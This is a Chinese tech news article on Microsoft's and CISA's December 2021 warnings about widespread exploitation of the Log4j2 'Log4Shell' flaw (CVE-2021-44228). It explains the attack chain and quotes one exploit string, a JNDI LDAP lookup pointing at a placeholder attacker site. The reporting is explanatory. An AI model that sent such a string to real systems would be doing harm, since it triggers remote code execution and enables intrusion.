首页 > 业界 > 关键词  > 正文

微软警告比SolarWinds影响更深远的Log4j2漏洞利用

2021-12-16 10:32 · 稿源: cnbeta

微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。

据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。

CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串:

${jndi:ldap://[attacker site]/a}

美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。

CISA 负责人 Jen Easterly 于昨日接受 CNN 采访时重申,若不迅速采取补救措施,各个联邦机构的设备、服务、乃至整个互联网,都将处于一个相当可怕的境地。

微软警告称,Log4j2 的风险源于两个方面。其一是漏洞可被轻松利用,其二是基于其构建的产品数量 —— 而 Apache Log4j2 就是当前最流行的 Java 日志库之一。

据悉,日志库用于为开发者提供有关服务和产品的附加信息,允许其控制在应用程序执行期间、用户登录特定服务 / 设备的错误报告,并在遇到功能问题时收集相关数据。

通过日志库的使用,开发者还可深入了解或收集设备详情,包括 CPU 类型 / GPU 型号、驱动程序版本、以及系统内存等。

攻击者会对使用 Log4j2 生成日志的目标系统执行 HTTP 请求,该日志利用 JNDI 向攻击者控制的站点执行请求,最终导致被利用的进程访问站点并执行有效负载。

在许多观察到的案例中,攻击者往往拿到了 DNS 日志系统的参数,旨在记录对站点的请求、以对易受攻击的系统进行指纹识别。

此前已知的一种漏洞利用,涉及微软旗下的《我的世界》服务器。攻击者以聊天框作为中部署的消息内容作为管道,试图渗透用户系统并夺得控制权。

事实上,全球许多知名企业都面临着巨大的风险,其中不乏微软、Twitter、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare 等科技巨头。

网络安全公司 Check Point 指出,截至目前,其 GitHub 项目的下载量已经超过 40 万次。遗憾的是,尽管 Apache 已经发布了一个修补程序,但各家公司的实施方案不尽相同。

对于数百上千万的客户来说,这意味着他们仍将在未来一段时间里面临 Log4j 入侵风险,或导致大量用户数据暴露于在外。

举报

  • 相关推荐
  • 自拍Vlog神器:自然美肤原片直出,告别复杂后期

    佳能PowerShot V1专为Vlog新手设计,解决操作复杂、画面模糊、后期繁琐等痛点。它具备智能场景识别、一键美颜、强大防抖及丰富滤镜,支持5.7K超采样视频,画质专业。机身轻巧仅426克,搭配多款实用套餐,帮助用户轻松上手、直出高质量内容,是记录生活的理想伙伴。

  • 2025新手Vlog相机排行榜:这5款相机,让你告别复杂后期

    本文针对视频创作新手,推荐了五款Vlog相机,强调设备应操作简便、画质出色、色彩讨喜,让用户专注于内容创作。重点介绍了佳能PowerShot V1,其具备优秀直出能力、多种滤镜和美肤模式,支持5.7K超采和4K视频,自动对焦稳定,重量轻便,适合旅行、直播等场景。其他推荐包括索尼ZV-1II、富士X-S20、松下G100D和大疆Pocket 3,各有特色,如智能化、胶片模拟或稳定性能,助新手轻松开启创作之旅。

  • 一机在手,随心创作:佳能R50V满足你对Vlog、人像与美食视频的所有想象

    佳能R50V微单相机专为视频创作者设计,兼具专业画质与便携性。机身仅重323克,支持6K超采4K视频,配备第二代全像素双核AF系统,可智能追踪人物、动物等多种主体。内置14种色彩滤镜与平滑皮肤功能,优化人像表现。创意拍摄模式支持慢快动作、电影宽银幕比例,竖拍优化与直播兼容性进一步提升创作效率,是Vlog、旅拍和街拍的理想工具。

  • 轻便Vlog相机怎么选?佳能R50V为何是便携创作的首选?

    本文推荐五款便携半画幅相机,满足Vlog博主、旅行爱好者及家庭用户对高画质与轻便易携的双重需求。佳能R50V以323克超轻机身、APS-C传感器及竖拍优化功能脱颖而出,支持6K超采4K视频与USB直播供电,是视频创作者的理想选择。佳能R50性价比高,索尼ZV-E10专注实时追踪对焦,富士X-S20内置胶片模拟模式,尼康Z30操作简洁续航强。总结指出,佳能R50V完美平衡便携性、专业画质与创作便利,真正实现“融入生活,点亮创作”。

  • 微云全息(NASDAQ:HOLO):嵌套链——区块链架构创新重塑安全性与能耗格局

    微云全息提出嵌套链创新设计,通过分层数据存储架构将敏感信息置于内层区块链严密保护,普通信息存于外层链。采用跨链交互协议确保信息验证安全,节点差异化配置兼顾安全与效率。该方案突破传统单链模式局限,实现信息分类精细管理,为区块链在复杂应用场景中的安全性、能耗优化及运行效率提升提供全新解决路径。

  • 佳能R50V双十一钜惠:漫展COS/汉服Vlog/直播带货一机搞定!

    佳能R50V微单相机以6000元内惊喜价格亮相双十一,配备全像素双核CMOS与智能对焦系统,支持人物/动物/车辆追踪。轻巧机身仅323克,优化握持设计便于外拍。具备6K超采4K录制、14种滤镜及美肤模式,竖拍界面完美适配短视频平台。USB直连实现4K60P直播供电,特写模式自动切换焦点,适合带货与教学。多档套餐覆盖从三脚架到专业滤镜,满足动漫COS、国风Vlog等多场景创作需求,是降低门槛提升品质的优选工具。

  • 成都春熙路现巨型LOL冠军奖杯雕塑 网友:电竞DNA被点燃

    ​近日,成都春熙路惊现一座高度约达10米的巨型LOL(英雄联盟)冠军奖杯雕塑,该雕塑以银白色金属质感呈现,高度还原了游戏中的经典“召唤师奖杯”造型,底座上还精心镌刻了历届14支冠军战队的名称,瞬间引发了广大游戏玩家的集体回忆与热烈讨论。 这座雕塑不仅在设计上独具匠心,更融入了前沿的科技互动元素。雕塑下方配备的大屏同步播放着虚拟皇冠动画,通过�

  • “留学博主”两周涨粉155万,另类vlog成流量密码?

    ​当留学赛道还充斥着“落地窗咖啡”“米其林研学”等精致叙事的当下,一位留学博主凭借记录留学期间“狼狈而又真实的生活,”迅速爆火出圈,一跃成为新的爆款。 这位博主就是“白日梦想家”。 第三方数据平台显示,他在抖音两周涨粉155万、单个视频获赞超200万。前几天,他还在视频号、快手等平台开设了同名账号。

  • OPPO ColorOS 16正式版11月升级机型公布:支持23款机型

    ColorOS 16正式版11月升级计划公布,涵盖OPPO Find X7/N3系列、一加Ace 5系列等23款机型。系统引入极光引擎、潮汐引擎及自研繁星编译器,显著提升流畅度并降低功耗。新增一键闪记功能,支持复杂图文与超长视频录制。生态互联实现突破,全面打通Apple Watch生态,支持打车、外卖等信息跨设备显示。通过软硬协同优化,为用户打造更流畅持久的操作体验。

  • OPPO ColorOS 16正式版推送:首批适配11款机型

    ColorOS 16正式版于10月30日启动推送,首批覆盖11款OPPO和一加热门机型。该系统引入极光引擎、潮汐引擎与繁星编译器三大流畅技术,实现感官、性能与底层的全方位提升。极光引擎打造业内首个“无缝隙架构”,确保全场景丝滑交互;潮汐引擎首发芯片级动态追帧技术,系统重载流畅度提升37%,功耗降低13%;繁星编译器首创安卓跨级融合编译技术,大幅提升低算力芯片性能。此次升级将增强品牌市场竞争力,为用户带来更出色的使用体验。

今日大家都在搜的词: